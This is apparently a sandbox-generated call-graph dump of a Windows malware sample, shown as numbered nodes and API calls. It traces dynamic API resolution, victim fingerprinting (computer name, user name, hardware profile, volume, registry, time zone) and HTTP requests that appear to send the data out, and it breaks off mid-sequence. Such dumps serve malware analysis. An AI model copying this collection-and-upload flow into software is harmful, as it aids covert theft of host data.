81595->81596 81597 4024ff 9 API calls 81596->81597 81598 403a21 81597->81598 81599 4024ff 9 API calls 81598->81599 81600 403a32 81599->81600 81601 4024ff 9 API calls 81600->81601 81602 403a43 81601->81602 81603 4024ff 9 API calls 81602->81603 81604 403a54 81603->81604 81605 4024ff 9 API calls 81604->81605 81606 403a65 81605->81606 81607 4024ff 9 API calls 81606->81607 81608 403a76 81607->81608 81609 4177ab 81608->81609 81610 417b90 9 API calls 81609->81610 81611 4177b8 43 API calls 81609->81611 81612 417c31 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 81610->81612 81613 417c9f 81610->81613 81611->81610 81612->81613 81614 417cac 8 API calls 81613->81614 81615 417d5f 81613->81615 81614->81615 81616 417dd6 81615->81616 81617 417d68 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 81615->81617 81618 417de3 6 API calls 81616->81618 81619 417e68 81616->81619 81617->81616 81618->81619 81620 417e75 9 API calls 81619->81620 81621 417f3f 81619->81621 81620->81621 81622 417fb6 81621->81622 81623 417f48 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 81621->81623 81624 417fe8 81622->81624 81625 417fbf GetProcAddress GetProcAddress 81622->81625 81623->81622 81626 417ff1 GetProcAddress GetProcAddress 81624->81626 81627 41801a 81624->81627 81625->81624 81626->81627 81628 418027 10 API calls 81627->81628 81629 418106 81627->81629 81628->81629 81630 418166 81629->81630 81631 41810f GetProcAddress GetProcAddress GetProcAddress GetProcAddress 81629->81631 81632 418181 81630->81632 81633 41816f GetProcAddress 81630->81633 81631->81630 81634 4181e1 81632->81634 81635 41818a GetProcAddress GetProcAddress GetProcAddress GetProcAddress 81632->81635 81633->81632 81636 416bad 81634->81636 81637 4181ea GetProcAddress 81634->81637 81635->81634 81638 410b42 _EH_prolog 81636->81638 81637->81636 81639 40f96a lstrcpy 81638->81639 81640 410b69 81639->81640 81641 40f96a lstrcpy 81640->81641 81642 410b80 GetSystemTime 81641->81642 81643 410b9e 81642->81643 81643->80850 81645 40faac 81644->81645 81646 40fad0 81645->81646 81647 40fabe lstrcpy lstrcat 81645->81647 81646->80859 81647->81646 81649 40f9a1 lstrcpy 81648->81649 81650 4010cc 81649->81650 81651 40f9a1 lstrcpy 81650->81651 81652 4010dc 81651->81652 81653 40f9a1 lstrcpy 81652->81653 81654 4010ec 81653->81654 81655 40f9a1 lstrcpy 81654->81655 81656 401108 81655->81656 81657 413901 _EH_prolog 81656->81657 81658 4135a1 _EH_prolog 81657->81658 81659 413927 81658->81659 81660 40f9de 2 API calls 81659->81660 81661 41393b 81660->81661 81662 40f9de 2 API calls 81661->81662 81663 41394b 81662->81663 81664 40f9de 2 API calls 81663->81664 81665 413958 81664->81665 81666 40f96a lstrcpy 81665->81666 81667 413965 81666->81667 81668 40f96a lstrcpy 81667->81668 81669 413976 81668->81669 81670 40f96a lstrcpy 81669->81670 81671 413987 81670->81671 81672 40f96a lstrcpy 81671->81672 81673 413998 81672->81673 81674 40f96a lstrcpy 81673->81674 81675 4139a9 81674->81675 81676 40f96a lstrcpy 81675->81676 81702 4139ba 81676->81702 81677 402121 lstrcpy 81677->81702 81679 402155 lstrcpy 81679->81702 81680 413ae6 StrCmpCA 81680->81702 81681 413b7c StrCmpCA 81682 41443d 81681->81682 81681->81702 81683 40fa28 lstrcpy 81682->81683 81684 41444c 81683->81684 82803 402155 81684->82803 81687 40fa28 lstrcpy 81689 414466 81687->81689 81688 413d53 StrCmpCA 81690 4143f5 81688->81690 81688->81702 82806 4022ae lstrcpy 81689->82806 81691 40fa28 lstrcpy 81690->81691 81692 414404 81691->81692 82801 4021a3 lstrcpy 81692->82801 81696 41440d 81701 40fa28 lstrcpy 81696->81701 81697 41447b 81700 40fa28 lstrcpy 81697->81700 81698 4010b1 _EH_prolog lstrcpy 81698->81702 81699 413f2a StrCmpCA 81699->81702 81703 4143b0 81699->81703 81705 414489 81700->81705 81704 41441e 81701->81704 81702->81677 81702->81679 81702->81680 81702->81681 81702->81688 81702->81698 81702->81699 81706 41310d 33 API calls 81702->81706 81707 4021bd lstrcpy 81702->81707 81712 40f9a1 lstrcpy 81702->81712 81713 40fa28 lstrcpy 81702->81713 81719 414101 StrCmpCA 81702->81719 81720 40216f lstrcpy 81702->81720 81724 40220b lstrcpy 81702->81724 81725 4021f1 lstrcpy 81702->81725 81728 413cbd StrCmpCA 81702->81728 81734 4021a3 lstrcpy 81702->81734 81736 4142d2 StrCmpCA 81702->81736 81742 402259 lstrcpy 81702->81742 81743 413e94 StrCmpCA 81702->81743 81756 41406b StrCmpCA 81702->81756 81758 40223f lstrcpy 81702->81758 81761 413020 28 API calls 81702->81761 81762 414242 StrCmpCA 81702->81762 81763 40228d lstrcpy 81702->81763 82785 40213b 81702->82785 82790 402189 lstrcpy 81702->82790 82791 4021d7 lstrcpy 81702->82791 82792 402225 lstrcpy 81702->82792 82793 402273 lstrcpy 81702->82793 81708 40fa28 lstrcpy 81703->81708 82802 4022c8 lstrcpy 81704->82802 82807 4132ce lstrcpy _EH_prolog 81705->82807 81706->81702 81707->81702 81709 4143bf 81708->81709 82799 4021f1 lstrcpy 81709->82799 81712->81702 81713->81702 81716 41439d 81723 40fa28 lstrcpy 81716->81723 81717 4143c8 81718 40fa28 lstrcpy 81717->81718 81722 4143d9 81718->81722 81719->81702 81721 41435f 81719->81721 81720->81702 81726 40fa28 lstrcpy 81721->81726 82800 4022e2 lstrcpy 81722->82800 81733 41433c 81723->81733 81724->81702 81725->81702 81727 41436e 81726->81727 82797 40223f lstrcpy 81727->82797 81728->81702 81732 414377 81735 40fa28 lstrcpy 81732->81735 82796 4132ce lstrcpy _EH_prolog 81733->82796 81734->81702 81738 414388 81735->81738 81739 4142ed 81736->81739 81740 4142dd Sleep 81736->81740 82798 4022fc lstrcpy 81738->82798 81741 40fa28 lstrcpy 81739->81741 81740->81702 81744 4142fc 81741->81744 81742->81702 81743->81702 82794 40228d lstrcpy 81744->82794 81748 414305 81750 40fa28 lstrcpy 81748->81750 81749 41435a 81751 41328a _EH_prolog 81749->81751 81753 414316 81750->81753 81752 4144fd 81751->81752 82788 401061 _EH_prolog 81752->82788 82795 402316 lstrcpy 81753->82795 81755 414509 81764 4136a8 81755->81764 81756->81702 81758->81702 81759 41432e 81760 40fa28 lstrcpy 81759->81760 81760->81733 81761->81702 81762->81702 81763->81702 81765 40fa28 lstrcpy 81764->81765 81766 4136b8 81765->81766 81767 40fa28 lstrcpy 81766->81767 81768 4136c4 81767->81768 81769 40fa28 lstrcpy 81768->81769 81770 4136d0 81769->81770 81771 41328a _EH_prolog 81770->81771 81772 4132aa 81771->81772 81772->80869 81774 40f9b8 81773->81774 81775 40f9cd 81774->81775 81776 40f9c5 lstrcpy 81774->81776 81775->80876 81776->81775 81777->80886 81779 40f96a lstrcpy 81778->81779 81780 40211c 81779->81780 81781 410525 _EH_prolog GetWindowsDirectoryA 81780->81781 81782 410557 81781->81782 81783 41055e GetVolumeInformationA 81781->81783 81782->81783 81784 41058e 81783->81784 81785 4105c0 GetProcessHeap HeapAlloc 81784->81785 81786 4105e3 wsprintfA lstrcat 81785->81786 81787 4105d5 81785->81787 82808 4104ea GetCurrentHwProfileA 81786->82808 81788 40f96a lstrcpy 81787->81788 81790 4105de 81788->81790 81790->80893 81791 410613 81792 410622 lstrlenA 81791->81792 81793 410636 81792->81793 82812 41113a lstrcpy malloc strncpy 81793->82812 81795 410640 81796 41064e lstrcat 81795->81796 81797 410661 81796->81797 81798 40f96a lstrcpy 81797->81798 81799 410672 81798->81799 81799->81790 81801 40f9a1 lstrcpy 81800->81801 81802 403b4e 81801->81802 82813 403a7d _EH_prolog 81802->82813 81804 403b5a 81805 40f96a lstrcpy 81804->81805 81806 403b77 81805->81806 81807 40f96a lstrcpy 81806->81807 81808 403b8a 81807->81808 81809 40f96a lstrcpy 81808->81809 81810 403b9b 81809->81810 81811 40f96a lstrcpy 81810->81811 81812 403bac 81811->81812 81813 40f96a lstrcpy 81812->81813 81814 403bbd 81813->81814 81815 403bcd InternetOpenA StrCmpCA 81814->81815 81816 403bef 81815->81816 81817 40414b InternetCloseHandle 81816->81817 81818 410b42 3 API calls 81816->81818 81831 40415f 81817->81831 81819 403c05 81818->81819 81820 40fa6f 3 API calls 81819->81820 81821 403c18 81820->81821 81822 40fa28 lstrcpy 81821->81822 81823 403c25 81822->81823 81824 40fae3 4 API calls 81823->81824 81825 403c4e 81824->81825 81826 40fa28 lstrcpy 81825->81826 81827 403c5b 81826->81827 81828 40fae3 4 API calls 81827->81828 81829 403c78 81828->81829 81830 40fa28 lstrcpy 81829->81830 81832 403c85 81830->81832 81831->80896 81833 40fa6f 3 API calls 81832->81833 81834 403ca1 81833->81834 81835 40fa28 lstrcpy 81834->81835 81836 403cae 81835->81836 81837 40fae3 4 API calls 81836->81837 81838 403ccb 81837->81838 81839 40fa28 lstrcpy 81838->81839 81840 403cd8 81839->81840 81841 40fae3 4 API calls 81840->81841 81842 403cf5 81841->81842 81843 40fa28 lstrcpy 81842->81843 81844 403d02 81843->81844 81845 40fae3 4 API calls 81844->81845 81846 403d20 81845->81846 81847 40fa6f 3 API calls 81846->81847 81848 403d33 81847->81848 81849 40fa28 lstrcpy 81848->81849 81850 403d40 81849->81850 81851 403d58 InternetConnectA 81850->81851 81851->81817 81852 403d7e HttpOpenRequestA 81851->81852 81853 404142 InternetCloseHandle 81852->81853 81854 403db7 81852->81854 81853->81817 81855 403dd1 81854->81855 81856 403dbb InternetSetOptionA 81854->81856 81857 40fae3 4 API calls 81855->81857 81856->81855 81858 403de2 81857->81858 81859 40fa28 lstrcpy 81858->81859 81860 403def 81859->81860 81861 40fa6f 3 API calls 81860->81861 81862 403e0b 81861->81862 81863 40fa28 lstrcpy 81862->81863 81864 403e18 81863->81864 81865 40fae3 4 API calls 81864->81865 81866 403e35 81865->81866 81867 40fa28 lstrcpy 81866->81867 81868 403e42 81867->81868 81869 40fae3 4 API calls 81868->81869 81870 403e60 81869->81870 81871 40fa28 lstrcpy 81870->81871 81872 403e6d 81871->81872 81873 40fae3 4 API calls 81872->81873 81874 403e8a 81873->81874 81875 40fa28 lstrcpy 81874->81875 81876 403e97 81875->81876 81877 40fae3 4 API calls 81876->81877 81878 403eb4 81877->81878 81879 40fa28 lstrcpy 81878->81879 81880 403ec1 81879->81880 81881 40fa6f 3 API calls 81880->81881 81882 403edd 81881->81882 81883 40fa28 lstrcpy 81882->81883 81884 403eea 81883->81884 81885 40fae3 4 API calls 81884->81885 81886 403f07 81885->81886 81887 40fa28 lstrcpy 81886->81887 81888 403f14 81887->81888 81889 40fae3 4 API calls 81888->81889 81890 403f31 81889->81890 81891 40fa28 lstrcpy 81890->81891 81892 403f3e 81891->81892 81893 40fa6f 3 API calls 81892->81893 81894 403f5a 81893->81894 81895 40fa28 lstrcpy 81894->81895 81896 403f67 81895->81896 81897 40fae3 4 API calls 81896->81897 81898 403f84 81897->81898 81899 40fa28 lstrcpy 81898->81899 81900 403f91 81899->81900 81901 40fae3 4 API calls 81900->81901 81902 403faf 81901->81902 81903 40fa28 lstrcpy 81902->81903 81904 403fbc 81903->81904 81905 40fae3 4 API calls 81904->81905 81906 403fd9 81905->81906 81907 40fa28 lstrcpy 81906->81907 81908 403fe6 81907->81908 81909 40fae3 4 API calls 81908->81909 81910 404003 81909->81910 81911 40fa28 lstrcpy 81910->81911 81912 404010 81911->81912 81913 40fa6f 3 API calls 81912->81913 81914 40402c 81913->81914 81915 40fa28 lstrcpy 81914->81915 81916 404039 81915->81916 81917 40f96a lstrcpy 81916->81917 81918 404052 81917->81918 81919 40fa6f 3 API calls 81918->81919 81920 404066 81919->81920 81921 40fa6f 3 API calls 81920->81921 81922 404079 81921->81922 81923 40fa28 lstrcpy 81922->81923 81924 404086 81923->81924 81925 4040a6 lstrlenA 81924->81925 81926 4040b6 81925->81926 81927 4040bf lstrlenA 81926->81927 82821 40fb94 81927->82821 81929 4040cf HttpSendRequestA 81930 404118 InternetReadFile 81929->81930 81931 40412f InternetCloseHandle 81930->81931 81934 4040de 81930->81934 82822 40f9d5 81931->82822 81933 40fae3 4 API calls 81933->81934 81934->81930 81934->81931 81934->81933 81935 40fa28 lstrcpy 81934->81935 81935->81934 82826 40fb94 81936->82826 81938 411ce4 StrCmpCA 81939 411cf6 81938->81939 81940 411cef ExitProcess 81938->81940 81941 411d06 strtok_s 81939->81941 81942 411e53 81941->81942 81943 411d17 81941->81943 81942->80898 81944 411e38 strtok_s 81943->81944 81945 411d83 StrCmpCA 81943->81945 81946 411dc2 StrCmpCA 81943->81946 81947 411e02 StrCmpCA 81943->81947 81948 411e24 StrCmpCA 81943->81948 81949 411d67 StrCmpCA 81943->81949 81950 411dd7 StrCmpCA 81943->81950 81951 411d4b StrCmpCA 81943->81951 81952 411dad StrCmpCA 81943->81952 81953 411dec StrCmpCA 81943->81953 81954 411d2f StrCmpCA 81943->81954 81955 40f9de 2 API calls 81943->81955 81944->81942 81944->81943 81945->81943 81945->81944 81946->81943 81946->81944 81947->81944 81948->81944 81949->81943 81949->81944 81950->81943 81950->81944 81951->81943 81951->81944 81952->81943 81952->81944 81953->81944 81954->81943 81954->81944 81955->81943 81957 40f9a1 lstrcpy 81956->81957 81958 4051ba 81957->81958 81959 403a7d 6 API calls 81958->81959 81960 4051c6 81959->81960 81961 40f96a lstrcpy 81960->81961 81962 4051e3 81961->81962 81963 40f96a lstrcpy 81962->81963 81964 4051f6 81963->81964 81965 40f96a lstrcpy 81964->81965 81966 405207 81965->81966 81967 40f96a lstrcpy 81966->81967 81968 405218 81967->81968 81969 40f96a lstrcpy 81968->81969 81970 405229 81969->81970 81971 405239 InternetOpenA StrCmpCA 81970->81971 81972 40525b 81971->81972 81973 40592b InternetCloseHandle 81972->81973 81974 410b42 3 API calls 81972->81974 81975 405946 81973->81975 81976 405271 81974->81976 82833 406295 CryptStringToBinaryA 81975->82833 81977 40fa6f 3 API calls 81976->81977 81979 405284 81977->81979 81981 40fa28 lstrcpy 81979->81981 81986 405291 81981->81986 81982 40f9de 2 API calls 81984 40595f 81982->81984 81983 405979 81995 401061 _EH_prolog 81983->81995 81985 40fae3 4 API calls 81984->81985 81987 40596d 81985->81987 81989 40fae3 4 API calls 81986->81989 81988 40fa28 lstrcpy 81987->81988 81988->81983 81990 4052ba 81989->81990 81991 40fa28 lstrcpy 81990->81991 81992 4052c7 81991->81992 81993 40fae3 4 API calls 81992->81993 81994 4052e4 81993->81994 81997 40fa28 lstrcpy 81994->81997 81996 4059d7 81995->81996 81996->80904 81998 4052f1 81997->81998 81999 40fa6f 3 API calls 81998->81999 82000 40530d 81999->82000 82001 40fa28 lstrcpy 82000->82001 82002 40531a 82001->82002 82003 40fae3 4 API calls 82002->82003 82004 405337 82003->82004 82005 40fa28 lstrcpy 82004->82005 82006 405344 82005->82006 82007 40fae3 4 API calls 82006->82007 82008 405361 82007->82008 82009 40fa28 lstrcpy 82008->82009 82010 40536e 82009->82010 82011 40fae3 4 API calls 82010->82011 82012 40538c 82011->82012 82013 40fa6f 3 API calls 82012->82013 82014 40539f 82013->82014 82015 40fa28 lstrcpy 82014->82015 82016 4053ac 82015->82016 82017 4053c4 InternetConnectA 82016->82017 82017->81973 82018 4053ea HttpOpenRequestA 82017->82018 82019 405421 82018->82019 82020 405922 InternetCloseHandle 82018->82020 82021 405425 InternetSetOptionA 82019->82021 82022 40543b 82019->82022 82020->81973 82021->82022 82023 40fae3 4 API calls 82022->82023 82024 40544c 82023->82024 82025 40fa28 lstrcpy 82024->82025 82026 405459 82025->82026 82027 40fa6f 3 API calls 82026->82027 82028 405475 82027->82028 82029 40fa28 lstrcpy 82028->82029 82030 405482 82029->82030 82031 40fae3 4 API calls 82030->82031 82032 40549f 82031->82032 82033 40fa28 lstrcpy 82032->82033 82034 4054ac 82033->82034 82035 40fae3 4 API calls 82034->82035 82036 4054ca 82035->82036 82037 40fa28 lstrcpy 82036->82037 82038 4054d7 82037->82038 82039 40fae3 4 API calls 82038->82039 82040 4054f5 82039->82040 82041 40fa28 lstrcpy 82040->82041 82042 405502 82041->82042 82043 40fae3 4 API calls 82042->82043 82044 40551f 82043->82044 82045 40fa28 lstrcpy 82044->82045 82046 40552c 82045->82046 82047 40fa6f 3 API calls 82046->82047 82048 405548 82047->82048 82049 40fa28 lstrcpy 82048->82049 82050 405555 82049->82050 82051 40fae3 4 API calls 82050->82051 82052 405572 82051->82052 82053 40fa28 lstrcpy 82052->82053 82054 40557f 82053->82054 82055 40fae3 4 API calls 82054->82055 82056 40559c 82055->82056 82057 40fa28 lstrcpy 82056->82057 82058 4055a9 82057->82058 82059 40fa6f 3 API calls 82058->82059 82060 4055c5 82059->82060 82061 40fa28 lstrcpy 82060->82061 82062 4055d2 82061->82062 82063 40fae3 4 API calls 82062->82063 82064 4055ef 82063->82064 82065 40fa28 lstrcpy 82064->82065 82066 4055fc 82065->82066 82067 40fae3 4 API calls 82066->82067 82068 40561a 82067->82068 82069 40fa28 lstrcpy 82068->82069 82070 405627 82069->82070 82071 40fae3 4 API calls 82070->82071 82072 405644 82071->82072 82073 40fa28 lstrcpy 82072->82073 82074 405651 82073->82074 82075 40fae3 4 API calls 82074->82075 82076 40566e 82075->82076 82077 40fa28 lstrcpy 82076->82077 82078 40567b 82077->82078 82079 402107 lstrcpy 82078->82079 82080 405690 82079->82080 82081 40fa6f 3 API calls 82080->82081 82082 4056a2 82081->82082 82083 40fa28 lstrcpy 82082->82083 82084 4056af 82083->82084 82085 40fae3 4 API calls 82084->82085 82086 4056d8 82085->82086 82087 40fa28 lstrcpy 82086->82087 82088 4056e5 82087->82088 82089 40fae3 4 API calls 82088->82089 82090 405702 82089->82090 82091 40fa28 lstrcpy 82090->82091 82092 40570f 82091->82092 82093 40fa6f 3 API calls 82092->82093 82094 40572b 82093->82094 82095 40fa28 lstrcpy 82094->82095 82096 405738 82095->82096 82097 40fae3 4 API calls 82096->82097 82098 405755 82097->82098 82099 40fa28 lstrcpy 82098->82099 82100 405762 82099->82100 82101 40fae3 4 API calls 82100->82101 82102 405780 82101->82102 82103 40fa28 lstrcpy 82102->82103 82104 40578d 82103->82104 82105 40fae3 4 API calls 82104->82105 82106 4057aa 82105->82106 82107 40fa28 lstrcpy 82106->82107 82108 4057b7 82107->82108 82109 40fae3 4 API calls 82108->82109 82110 4057d4 82109->82110 82111 40fa28 lstrcpy 82110->82111 82112 4057e1 82111->82112 82113 40fa6f 3 API calls 82112->82113 82114 4057fd 82113->82114 82115 40fa28 lstrcpy 82114->82115 82116 40580a 82115->82116 82117 40581e lstrlenA 82116->82117 82827 40fb94 82117->82827 82119 40582f lstrlenA GetProcessHeap HeapAlloc 82828 40fb94 82119->82828 82121 405851 lstrlenA 82829 40fb94 82121->82829 82123 405861 memcpy 82830 40fb94 82123->82830 82125 405873 lstrlenA 82126 405883 82125->82126 82127 40588c lstrlenA memcpy 82126->82127 82831 40fb94 82127->82831 82129 4058a8 lstrlenA 82832 40fb94 82129->82832 82131 4058b8 HttpSendRequestA 82132 405904 InternetReadFile 82131->82132 82133 40591b InternetCloseHandle 82132->82133 82135 4058ca 82132->82135 82133->82020 82134 40fae3 4 API calls 82134->82135 82135->82132 82135->82133 82135->82134 82136 40fa28 lstrcpy 82135->82136 82136->82135 82838 40fb94 82137->82838 82139 411726 strtok_s 82140 411733 82139->82140 82144 41178f 82139->82144 82141 411778 strtok_s 82140->82141 82142 40f9de 2 API calls 82140->82142 82143 40f9de 2 API calls 82140->82143 82141->82140 82141->82144 82142->82141 82143->82140 82144->80906 82839 40fb94 82145->82839 82147 411503 strtok_s 82148 411614 82147->82148 82150 411514 82147->82150 82148->80914 82149 4115c5 StrCmpCA 82149->82150 82150->82149 82151 40f9de 2 API calls 82150->82151 82152 4115f7 strtok_s 82150->82152 82153 411594 StrCmpCA 82150->82153 82154 41156f StrCmpCA 82150->82154 82155 411541 StrCmpCA 82150->82155 82151->82152 82152->82148 82152->82150 82153->82150 82154->82150 82155->82150 82840 40fb94 82156->82840 82158 41165a strtok_s 82159 4116e0 82158->82159 82163 411667 82158->82163 82159->80922 82160 40f9de 2 API calls 82162 4116c9 strtok_s 82160->82162 82161 411691 StrCmpCA 82161->82163 82162->82159 82162->82163 82163->82160 82163->82161 82163->82162 82164 40f9de 2 API calls 82163->82164 82164->82163 82166 40f96a lstrcpy 82165->82166 82167 414708 82166->82167 82168 40fae3 4 API calls 82167->82168 82169 41471d 82168->82169 82170 40fa28 lstrcpy 82169->82170 82171 41472a 82170->82171 82841 4020ed 82171->82841 82174 40fa6f 3 API calls 82175 414751 82174->82175 82176 40fa28 lstrcpy 82175->82176 82177 41475e 82176->82177 82178 40fae3 4 API calls 82177->82178 82179 414787 82178->82179 82180 40fa28 lstrcpy 82179->82180 82181 414794 82180->82181 82182 40fae3 4 API calls 82181->82182 82183 4147b1 82182->82183 82184 40fa28 lstrcpy 82183->82184 82185 4147be 82184->82185 82186 40fae3 4 API calls 82185->82186 82187 4147db 82186->82187 82188 40fa28 lstrcpy 82187->82188 82189 4147e8 82188->82189 82844 40fc7f GetProcessHeap HeapAlloc GetLocalTime wsprintfA 82189->82844 82191 4147f9 82192 40fae3 4 API calls 82191->82192 82193 414806 82192->82193 82194 40fa28 lstrcpy 82193->82194 82195 414813 82194->82195 82196 40fae3 4 API calls 82195->82196 82197 414830 82196->82197 82198 40fa28 lstrcpy 82197->82198 82199 41483d 82198->82199 82200 40fae3 4 API calls 82199->82200 82201 41485a 82200->82201 82202 40fa28 lstrcpy 82201->82202 82203 414867 82202->82203 82845 41045d memset RegOpenKeyExA 82203->82845 82205 414878 82206 40fae3 4 API calls 82205->82206 82207 414885 82206->82207 82208 40fa28 lstrcpy 82207->82208 82209 414892 82208->82209 82210 40fae3 4 API calls 82209->82210 82211 4148af 82210->82211 82212 40fa28 lstrcpy 82211->82212 82213 4148bc 82212->82213 82214 40fae3 4 API calls 82213->82214 82215 4148d9 82214->82215 82216 40fa28 lstrcpy 82215->82216 82217 4148e6 82216->82217 82218 4104ea 2 API calls 82217->82218 82219 4148fb 82218->82219 82220 40fa6f 3 API calls 82219->82220 82221 41490d 82220->82221 82222 40fa28 lstrcpy 82221->82222 82223 41491a 82222->82223 82224 40fae3 4 API calls 82223->82224 82225 414943 82224->82225 82226 40fa28 lstrcpy 82225->82226 82227 414950 82226->82227 82228 40fae3 4 API calls 82227->82228 82229 41496d 82228->82229 82230 40fa28 lstrcpy 82229->82230 82231 41497a 82230->82231 82232 410525 13 API calls 82231->82232 82233 41498f 82232->82233 82234 40fa6f 3 API calls 82233->82234 82235 4149a1 82234->82235 82236 40fa28 lstrcpy 82235->82236 82237 4149ae 82236->82237 82238 40fae3 4 API calls 82237->82238 82239 4149d7 82238->82239 82240 40fa28 lstrcpy 82239->82240 82241 4149e4 82240->82241 82242 40fae3 4 API calls 82241->82242 82243 414a01 82242->82243 82244 40fa28 lstrcpy 82243->82244 82245 414a0e 82244->82245 82246 414a1a GetCurrentProcessId 82245->82246 82849 410fe7 OpenProcess 82246->82849 82249 40fa6f 3 API calls 82250 414a3d 82249->82250 82251 40fa28 lstrcpy 82250->82251 82252 414a4a 82251->82252 82253 40fae3 4 API calls 82252->82253 82254 414a73 82253->82254 82255 40fa28 lstrcpy 82254->82255 82256 414a80 82255->82256 82257 40fae3 4 API calls 82256->82257 82258 414a9d 82257->82258 82259 40fa28 lstrcpy 82258->82259 82260 414aaa 82259->82260 82261 40fae3 4 API calls 82260->82261 82262 414ac7 82261->82262 82263 40fa28 lstrcpy 82262->82263 82264 414ad4 82263->82264 82265 40fae3 4 API calls 82264->82265 82266 414af1 82265->82266 82267 40fa28 lstrcpy 82266->82267 82268 414afe 82267->82268 82854 410693 GetProcessHeap HeapAlloc 82268->82854 82271 40fae3 4 API calls 82272 414b1c 82271->82272 82273 40fa28 lstrcpy 82272->82273 82274 414b29 82273->82274 82275 40fae3 4 API calls 82274->82275 82276 414b46 82275->82276 82277 40fa28 lstrcpy 82276->82277 82278 414b53 82277->82278 82279 40fae3 4 API calls 82278->82279 82280 414b70 82279->82280 82281 40fa28 lstrcpy 82280->82281 82282 414b7d 82281->82282 82860 4107a6 _EH_prolog CoInitializeEx CoInitializeSecurity CoCreateInstance 82282->82860 82285 40fa6f 3 API calls 82286 414ba4 82285->82286 82287 40fa28 lstrcpy 82286->82287 82288 414bb1 82287->82288 82289 40fae3 4 API calls 82288->82289 82290 414bda 82289->82290 82291 40fa28 lstrcpy 82290->82291 82292 414be7 82291->82292 82293 40fae3 4 API calls 82292->82293 82294 414c04 82293->82294 82295 40fa28 lstrcpy 82294->82295 82296 414c11 82295->82296 82874 41092f _EH_prolog CoInitializeEx CoInitializeSecurity CoCreateInstance 82296->82874 82299 40fa6f 3 API calls 82300 414c38 82299->82300 82301 40fa28 lstrcpy 82300->82301 82302 414c45 82301->82302 82303 40fae3 4 API calls 82302->82303 82304 414c6e 82303->82304 82305 40fa28 lstrcpy 82304->82305 82306 414c7b 82305->82306 82307 40fae3 4 API calls 82306->82307 82308 414c98 82307->82308 82309 40fa28 lstrcpy 82308->82309 82310 414ca5 82309->82310 82888 40fc44 GetProcessHeap HeapAlloc GetComputerNameA 82310->82888 82313 40fae3 4 API calls 82314 414cc3 82313->82314 82315 40fa28 lstrcpy 82314->82315 82316 414cd0 82315->82316 82317 40fae3 4 API calls 82316->82317 82318 414ced 82317->82318 82319 40fa28 lstrcpy 82318->82319 82320 414cfa 82319->82320 82321 40fae3 4 API calls 82320->82321 82322 414d17 82321->82322 82323 40fa28 lstrcpy 82322->82323 82324 414d24 82323->82324 82890 40fc12 GetProcessHeap HeapAlloc GetUserNameA 82324->82890 82326 414d35 82327 40fae3 4 API calls 82326->82327 82328 414d42 82327->82328 82329 40fa28 lstrcpy 82328->82329 82330 414d4f 82329->82330 82331 40fae3 4 API calls 82330->82331 82332 414d6c 82331->82332 82333 40fa28 lstrcpy 82332->82333 82334 414d79 82333->82334 82335 40fae3 4 API calls 82334->82335 82336 414d96 82335->82336 82337 40fa28 lstrcpy 82336->82337 82338 414da3 82337->82338 82891 4103e8 7 API calls 82338->82891 82341 40fa6f 3 API calls 82342 414dca 82341->82342 82343 40fa28 lstrcpy 82342->82343 82344 414dd7 82343->82344 82345 40fae3 4 API calls 82344->82345 82346 414e00 82345->82346 82347 40fa28 lstrcpy 82346->82347 82348 414e0d 82347->82348 82349 40fae3 4 API calls 82348->82349 82350 414e2a 82349->82350 82351 40fa28 lstrcpy 82350->82351 82352 414e37 82351->82352 82894 40fd2c _EH_prolog 82352->82894 82355 40fa6f 3 API calls 82356 414e61 82355->82356 82357 40fa28 lstrcpy 82356->82357 82358 414e6e 82357->82358 82359 40fae3 4 API calls 82358->82359 82360 414e9d 82359->82360 82361 40fa28 lstrcpy 82360->82361 82362 414eaa 82361->82362 82363 40fae3 4 API calls 82362->82363 82364 414eca 82363->82364 82365 40fa28 lstrcpy 82364->82365 82366 414ed7 82365->82366 82904 40fc7f GetProcessHeap HeapAlloc GetLocalTime wsprintfA 82366->82904 82368 414ee8 82369 40fae3 4 API calls 82368->82369 82370 414ef5 82369->82370 82371 40fa28 lstrcpy 82370->82371 82372 414f02 82371->82372 82373 40fae3 4 API calls 82372->82373 82374 414f22 82373->82374 82375 40fa28 lstrcpy 82374->82375 82376 414f2f 82375->82376 82377 40fae3 4 API calls 82376->82377 82378 414f52 82377->82378 82379 40fa28 lstrcpy 82378->82379 82380 414f5f 82379->82380 82905 40fcd9 GetProcessHeap HeapAlloc GetTimeZoneInformation 82380->82905 82383 40fae3 4 API calls 82384 414f83 82383->82384 82385 40fa28 lstrcpy 82384->82385 82386 414f90 82385->82386 82387 40fae3 4 API calls 82386->82387 82388 414fb3 82387->82388 82389 40fa28 lstrcpy 82388->82389 82390 414fc0 82389->82390 82391 40fae3 4 API calls 82390->82391 82392 414fe3 82391->82392 82393 40fa28 lstrcpy 82392->82393 82394 414ff0 82393->82394 82395 40fae3 4 API calls 82394->82395 82396 415013 82395->82396 82397 40fa28 lstrcpy 82396->82397 82398 415020 82397->82398 82908 40fe5f GetProcessHeap HeapAlloc RegOpenKeyExA 82398->82908 82401 40fae3 4 API calls 82402 415044 82401->82402 82403 40fa28 lstrcpy 82402->82403 82404 415051 82403->82404 82405 40fae3 4 API calls 82404->82405 82406 415074 82405->82406 82407 40fa28 lstrcpy 82406->82407 82408 415081 82407->82408 82409 40fae3 4 API calls 82408->82409 82410 4150a1 82409->82410 82411 40fa28 lstrcpy 82410->82411 82412 4150ae 82411->82412 82911 40fefb 82412->82911 82415 40fae3 4 API calls 82416 4150cc 82415->82416 82417 40fa28 lstrcpy 82416->82417 82418 4150d9 82417->82418 82419 40fae3 4 API calls 82418->82419 82420 4150f9 82419->82420 82421 40fa28 lstrcpy 82420->82421 82422 415106 82421->82422 82423 40fae3 4 API calls 82422->82423 82424 415126 82423->82424 82425 40fa28 lstrcpy 82424->82425 82426 415133 82425->82426 82926 40fec8 GetSystemInfo wsprintfA 82426->82926 82428 415144 82429 40fae3 4 API calls 82428->82429 82430 415151 82429->82430 82431 40fa28 lstrcpy 82430->82431 82432 41515e 82431->82432 82433 40fae3 4 API calls 82432->82433 82434 41517e 82433->82434 82435 40fa28 lstrcpy 82434->82435 82436 41518b 82435->82436 82437 40fae3 4 API calls 82436->82437 82438 4151ab 82437->82438 82439 40fa28 lstrcpy 82438->82439 82440 4151b8 82439->82440 82927 40ffc9 GetProcessHeap HeapAlloc 82440->82927 82442 4151c9 82443 40fae3 4 API calls 82442->82443 82444 4151d6 82443->82444 82445 40fa28 lstrcpy 82444->82445 82446 4151e3 82445->82446 82447 40fae3 4 API calls 82446->82447 82448 